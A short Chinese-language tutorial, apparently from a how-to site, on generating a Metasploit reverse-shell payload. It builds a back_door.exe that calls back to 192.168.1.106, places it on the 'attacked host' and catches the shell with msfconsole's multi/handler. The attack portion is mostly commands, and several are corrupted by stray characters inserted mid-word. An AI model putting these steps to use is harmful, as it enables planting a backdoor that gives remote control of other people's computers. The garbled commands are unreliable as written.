【人人都该知道的网络安全】msf攻击载荷
Metasploit中的载荷是在目标计算机上执行的一端代码,msf攻击载荷生成器允许用户把载荷进行分装,生成可运行的Shellcode。
工具/原料
vm
metasploit
准备阶段
1、拓扑结构
2、使用msf生成msfpayload -h //显示msfpayload命令的使用方法
3、msfpayload -l显示msfpayload支持的全面载荷
4、msfpayload win蟠校盯昂dows/shell_reverse_tcp O显示shell_reverse忧溲枷茫_tcp这个payload需要设置的参数,该payload会从服务器反弹连接到指定的控制端上,以上的“o”是大写的英文字母
5、msfpayload win蟠校盯昂dows/shell_reverse_tcp LHOST=192.168.1.106 X>back_door.exe 设置反弹连接的地址为192.168.1.106,X参数表示生成可执行文件。
6、生成的可执行文件
7、将文件放在被攻击的主机上
测试
1、使用msfconsole进行测试
2、use exploit/multi/hand盟敢势袂le //装入模块set payload windows/shell/reverse_tcp//设置Show options//查看选项
3、set LHOST 192.168.1.106//设置选项exploit //启用模块
结果
1、得到反弹连接
声明:本网站引用、摘录或转载内容仅供网站访问者交流或参考,不代表本站立场,如存在版权或非法内容,请联系站长删除,联系邮箱:site.kefu@qq.com。
阅读量:67
阅读量:76
阅读量:79
阅读量:33
阅读量:63